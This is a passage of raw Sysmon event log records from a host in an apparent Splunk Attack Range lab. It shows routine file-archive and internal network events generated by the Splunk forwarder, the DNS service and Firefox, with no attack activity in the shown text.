Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D876CA55D036D0034445AD1D1AD867B,SHA256=005BF5D254A05CB7DD0E831E3A546F3EDDC09A6906D4495A0CE9ACF7D973EA4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:11.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021F930C4F2FC34556815FB6228C6E69,SHA256=F790766A5513627AAD6EE598BEBC69CC737C020F53AA03A78DF81BE4C628EB8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:12.545{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03046D8A07BC80ABBCEDC5C16645C487,SHA256=F73A49777D91A14B95FE2FD47C6D33F59000FEFE979FB1D7A0754506B5F920A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:12.014{05ADC7E1-229F-6039-1100-00000000AD01}1152NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=4FE77BEA82270E3D8B76C8AC489DC746,SHA256=53BCEC33079AC516B2D6F27D86DE0E54C2BE3A58C45FB85C056EF06FA2624E6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.268{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60208-false10.0.1.12-8000- 23542300x80000000000000002245316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:13.580{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCAA9484DEF0074C08BC2B9EE3E071B6,SHA256=E5BD841418AE328AA6DAB0A70C6EECE8CA4302BC4DEAB8C5C11DEE586ECAEE6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:13.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5414D9BB408554AC39272F6EBE2AF43C,SHA256=1D8B2BAFF18F0E8CB5B609BF63E37E8D69C1143485E35335AF12CC90A4BE5ACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:14.608{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FF38F73BFB772A54CE2A410C1AAC997,SHA256=C90C789211CD94730E0F5245D65C9193518FC6B9A134EBFB56F7CDFBA4CE6DCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:14.467{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A729ACE3AB66161A264905641679FF2,SHA256=647521AB6257592FBE0342B1A180193E7E3EF05C426317303D2EB05A3B49B089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:15.639{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9321ED43FC84E7E7989B8F8507052B61,SHA256=B7893E2E18494C308FD0C3AF77947D47B97C672EB683D2E631BBAB26E446ED53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:16.673{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49BA6042BBE0A6DCDB21BBC37284B2E6,SHA256=E2373B07B677A1E35574DF9C177888B0FC64205DE8527AC55F7EE1DCAA884078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:17.858{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14CBB636FEF23437F1DB7A368AE37D6A,SHA256=64312F01192C4EBB005D94B9D5EF4F453D2F1CD2D9951F836E4CF1D002D1DC0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:17.702{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFFA3C3D4FDC36259C2969B9A2D218AA,SHA256=06E8B2DED20884977D6627FCA44E4BD275BCC592EB37F792921C33D7498ED2AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:18.717{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF084E55D39A527AE0855331C3C62061,SHA256=2B3968A59A19DB7D69DBDA88843D77C309464A19AE21B28A34FE708CEC92412C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:08.267{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60209-false10.0.1.12-8000- 354300x80000000000000002245324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:07.954{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local55397- 23542300x80000000000000002245328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:19.733{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8110FEBC6639D62AFDEA665FFCE0E7BA,SHA256=68D7B625201CA4A17F38806065FECDBBD1300DA7AE045078E5B9EF9E2C5FBEF6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:08.970{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local55397- 23542300x80000000000000002245329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:20.749{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD17A0A631445F8886E05D872E546F33,SHA256=BA64B48BA179C729BF9DA6375337834C389BC406432852B6762AA5A1CBED21C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:21.764{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56ED45F3B7661EB16AB5C10B2AADE6C5,SHA256=B93373D1EA8715171EB3C962F7CAA57463723FC49563EF4D73E2FEA60829FDF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:21.499{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E3C70FDA0B38AF78DC08CC49FA6CF88E,SHA256=6CD30290DA2721EFF3BBE92C50812B513EFD5CA6A69C60EE75BB1090419BCF96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:22.783{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B33F656844FA5F75B6F3007049CDD00,SHA256=764C9D839338E21692BFE7913E3197E3962368ACECE74028766C79BB05ACAFF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:23.858{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFCF920998C02722ED040A22B3F52B65,SHA256=DF834CDD35109D463587BBF6D70B81A4129D7CE938FB3C5B08FF9EC276F0AC7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:13.315{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60210-false10.0.1.12-8000- 23542300x80000000000000002245333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:23.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3858D561EB08D4779FE73CC63D0C9FA1,SHA256=DA4AF43931E189B29E86BAD7161275E498B0385BBE50AFA392A9C6A917861C13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:24.921{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91BA74558DC323704CE665EDBCD5EFD0,SHA256=9271760199133CF66D711C208657BC29CD9A04CFC18D2EEA9918D146D967032D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:25.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE4897A73D188EA7F74A5BDF39FC733,SHA256=0F486731243EED9CFF4740799F0172A8DD18C72CB10AC7A091724C0EFE6E6DA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:25.530{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE09425FE5BEF9CC19C53AF1A6BB1D1F,SHA256=7A04C44A31AC4FC0B8D24412AB40B44C70746A0DC237C6FD7A8802FAC9CF710A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:26.967{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931FFC79144FCA6C03E813FD62AC3A08,SHA256=B859CF5CC88198784209BC9C804837DC474922F5B0F428A37DB73A074F92BFA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:27.999{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A55A67D5C19B2AAF8378C9DA8F4848B8,SHA256=BF38C4AD9B00C0DB0E25B029AB5B67CDD6AE4DDDBCEA7D06B7C1699D09A61AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:29.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87BCD9F900813D6878A3F463849B9DEF,SHA256=CC8D7D11607228E85D1D6BE80A149B0FF94F95EEE426B720EEE5C2C745B5CC22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:29.030{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D677721E09355C62D1E809F7142CC27F,SHA256=D0D7BB3C4C6C35CE1894EDD0606303E6CE73563118168096B19E72B89484754D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:30.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=945AC4B17B265A5BF978639BAAE5944A,SHA256=C7D45F089CA31ABFC0CC6E248D13D46848666DEE3770EE6DE7A63637559BDCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:30.046{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8004757993EA25FA57FF1B79676795B,SHA256=EB0CB279515FFD19C747C64A78B54D9DE9D0ABF4C35E4D31B59823B2FBA133EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:19.314{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60211-false10.0.1.12-8000- 354300x80000000000000002245349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:21.360{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local50641- 23542300x80000000000000002245348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:31.296{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81BE8F4F2299D9EA880295476D7DB61C,SHA256=364CC7EABE77B5150FC6664E9F39042AEE52B3991A078CEA4A91BD50F7141C00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:31.061{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6259BD855597056F17E9066D3B3A5CE5,SHA256=C24676EB62C9BBF146C41D7CBEEDB7EF5F784EEF23574FDC98ACC633ABD20126,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:20.345{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local50641- 23542300x80000000000000002245350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:32.081{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39531925B115F5DC4173B311676BCC89,SHA256=50B2B89F426783F8CC5395A9433ED2590ECA104E962CF847BE95C05811544CEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:33.108{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9743FB4CE0DC7FDF79A85152ECD91810,SHA256=C06C13A2E4DC5240558DA14CE5D46CF1F45A59031AD5F9DE5A51BA638BBF3CF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:24.392{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60213-false10.0.1.12-8000- 354300x80000000000000002245354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:24.251{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64825- 23542300x80000000000000002245353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:34.141{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B351483B06A1BEFB2CC34FD710C17630,SHA256=58B1F526034AFF70F0E0569CA27998F5D21EFFF34376EC8E556EF65B0C7EBA86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:34.141{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8C1E7C5F7DA02DC4DDD0D11DF319D4,SHA256=19BE4E1DED50BC0DBB5791C51E36DE57A94B8C871F2B77093F1B4C161580837B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:35.155{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CD106857787EBAF18987A347288347,SHA256=064D5BF1622C52880CCF8CB394B62E5D099716540E80C48041CA475877FF2A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:36.499{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:36.165{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0D0E6F8C21E6AC4FD4C4500809EEEE,SHA256=2B3D4203C3974DBC79B38662FF9DE21AB7CE1EE931DAF5AD1E4552769E167757,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:25.266{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local64825- 23542300x80000000000000002245361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:37.499{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35FD794AF9B57E1ECE9798E0404E7EDD,SHA256=D5B8A428C579A4B50368CEB2F14BA8E3E9EB3DAAFAA1B1B078B6B5BB575283B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:37.171{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27A0A8FB3EC1B04F9D94264867820D9C,SHA256=0932C4D31017198D9A254407A5EA7B66A05F37104C1A2C40547A5B93116877FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:38.175{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0F8F84A09F739A20D9CB25BCAC44AE,SHA256=519E7315852091C9344DDB877A7A8192D5E76B903EB64B824893BC937ACBA9F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:27.626{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60214-false10.0.1.12-8089- 23542300x80000000000000002245365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:39.530{05ADC7E1-7946-6039-1610-00000000AD01}3144ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\9unhrnfd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=605933CEF5B6167F600B708C197A4D49,SHA256=A2F117D3AE9763C62054DE960E1113FB5A8DF9697E040A97F59873F01293023E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:39.188{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 